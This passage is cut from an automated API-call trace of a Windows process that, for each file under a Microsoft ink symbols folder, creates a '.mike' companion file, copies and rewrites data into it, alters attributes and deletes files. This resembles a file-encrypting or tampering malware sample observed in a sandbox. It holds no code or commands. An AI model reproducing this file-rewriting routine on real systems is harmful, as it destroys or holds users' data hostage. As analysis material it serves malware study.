lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", lpFilePart=0x0) returned 0x58 [0046.255] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.255] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c50b80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5c50b80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c50b80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x510)) returned 1 [0046.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml", lpFilePart=0x0) returned 0x53 [0046.255] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike", lpFilePart=0x0) returned 0x58 [0046.255] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.mike")) returned 1 [0046.256] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.256] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.256] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.258] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.258] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.259] GetFileType (hFile=0x264) returned 0x1 [0046.259] GetFileType (hFile=0x264) returned 0x1 [0046.259] CloseHandle (hObject=0x264) returned 1 [0046.259] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.259] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.259] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.259] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.259] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), fInfoLevelId=0x0, lpFileInformation=0x22c85cc | out: lpFileInformation=0x22c85cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed)) returned 1 [0046.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.259] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.259] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), fInfoLevelId=0x0, lpFileInformation=0x22c8928 | out: lpFileInformation=0x22c8928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed)) returned 1 [0046.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", lpFilePart=0x0) returned 0x5b [0046.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.260] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", lpFilePart=0x0) returned 0x5b [0046.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0046.260] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0046.260] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", lpFilePart=0x0) returned 0x5b [0046.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.261] GetFileType (hFile=0x264) returned 0x1 [0046.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.261] GetFileType (hFile=0x264) returned 0x1 [0046.261] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.261] WriteFile (in: hFile=0x264, lpBuffer=0x22c9954*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22c9954*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.262] CloseHandle (hObject=0x264) returned 1 [0046.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0046.262] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), fInfoLevelId=0x0, lpFileInformation=0x22c93f8 | out: lpFileInformation=0x22c93f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed)) returned 1 [0046.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0046.262] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.262] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.262] GetFileType (hFile=0x264) returned 0x1 [0046.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.262] GetFileType (hFile=0x264) returned 0x1 [0046.263] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.263] ReadFile (in: hFile=0x264, lpBuffer=0x22caaa0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22caaa0*, lpNumberOfBytesRead=0x2af038*=0x2ed, lpOverlapped=0x0) returned 1 [0046.278] CloseHandle (hObject=0x264) returned 1 [0046.278] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", lpFilePart=0x0) returned 0x5b [0046.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.278] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.279] GetFileType (hFile=0x264) returned 0x1 [0046.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.279] GetFileType (hFile=0x264) returned 0x1 [0046.279] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.279] WriteFile (in: hFile=0x264, lpBuffer=0x22ceaf4*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22ceaf4*, lpNumberOfBytesWritten=0x2af02c*=0x2f0, lpOverlapped=0x0) returned 1 [0046.279] CloseHandle (hObject=0x264) returned 1 [0046.280] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", lpFilePart=0x0) returned 0x5b [0046.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0046.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.280] GetFileType (hFile=0x264) returned 0x1 [0046.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0046.280] GetFileType (hFile=0x264) returned 0x1 [0046.281] WriteFile (in: hFile=0x264, lpBuffer=0x22d1d40*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22d1d40*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.281] CloseHandle (hObject=0x264) returned 1 [0046.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", lpFilePart=0x0) returned 0x5b [0046.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.282] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c76ce0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5c76ce0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c9ce40, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x510)) returned 1 [0046.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", lpFilePart=0x0) returned 0x5b [0046.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.282] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22d35a8 | out: lpFileInformation=0x22d35a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c76ce0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5c76ce0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c9ce40, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x510)) returned 1 [0046.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", dwFileAttributes=0x80) returned 0 [0046.283] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.283] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", lpFilePart=0x0) returned 0x5b [0046.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.284] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c76ce0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5c76ce0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c9ce40, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x510)) returned 1 [0046.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0046.284] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", lpFilePart=0x0) returned 0x56 [0046.284] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike", lpFilePart=0x0) returned 0x5b [0046.284] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.mike")) returned 1 [0046.285] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.285] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.285] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0046.285] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0046.286] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml", lpFilePart=0x0) returned 0x54 [0046.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0046.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft 